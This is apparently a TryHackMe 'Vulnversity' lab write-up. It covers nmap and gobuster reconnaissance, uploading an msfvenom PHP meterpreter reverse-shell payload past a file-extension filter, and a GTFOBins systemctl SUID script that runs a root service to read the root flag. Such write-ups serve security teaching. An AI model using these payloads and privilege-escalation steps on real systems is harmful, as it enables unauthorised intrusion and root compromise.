TryHackMe - Vulnversity

The room link can be found at TryHackMe - Vulnversity

Reconnaissance

Nmap

First, we do a simple Nmap scan

nmap $IP
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3128/tcp open  squid-http
3333/tcp open  dec-notes

We find six ports open, we can now make a more in-depth scan with nmap -sC -sV $IP. It will found the service type and version.

nmap -sC -sV $IP
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
|   256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_  256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: vulnuniversity
|   NetBIOS computer name: VULNUNIVERSITY\x00
|   Domain name: \x00
|   FQDN: vulnuniversity
|_  System time: 2020-09-02T14:44:45-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-09-02T18:44:46
|_  start_date: N/A

From the OpenSSH version we can find out that the os type is Ubuntu Linux.

Gobuster

There is an HTTP port open on 3333 so we can start enumerating it.

gobuster dir -w GitHub/SecLists/Discovery/Web-Content/big.txt -u http://10.10.232.204:3333/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.232.204:3333/
[+] Threads:        10
[+] Wordlist:       GitHub/SecLists/Discovery/Web-Content/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/02 20:52:40 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/internal (Status: 301)
/js (Status: 301)
/server-status (Status: 403)
===============================================================
2020/09/02 20:56:58 Finished
===============================================================

We can see various pages. Visiting them we find that on /internal there is an upload form.

If we run gobuster again on this path we can find a second directory /internal/uploads/.

Exploitation

Compromise the webserver

We start by generating our reverse shell. I chose to use a meterpreter reverse shell.

msfvenom --payload php/meterpreter/reverse_tcp  LHOST=$USER_IP LPORT=$PORT > payload.php

Lets also start the Metasploit console with an exploit/multi/handler.

Unfortunately if we try to upload it the extension is blocked. If we try the extensions provided in the image from the challenge, we find that one works. We can find the uploaded file in the /internal/uploads/ directory that we found before.

We now have a shell on the box.

Now we background the session and use the post/linux/gather/enum_system to enumerate the system information, including the user accounts. With the loot command, we can list the gathered items, and at the end of there user list, we have the bill user. In his home directory, we can find the user flag which is readable by www-data (our user).

Privilege escalation

To gather more information about the box, we can use the upload command to upload the linPEAS script. This will list all the interesting information on the box, including the SUID binaries. Une of them sticks out, the systemctl executable that bad since we can execute and change the state of all the services on the machine without root privilege. We look up systemctl | GTFOBins to find an easy way to exploit it.

#!/bin/sh

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF

This script will create a temp service file, link, enable, and run it. The service will be run as root and will cat the flag into the tmp directory that is readable for us. We could also run a meterpreter reverse shell to gain a root shell on the box.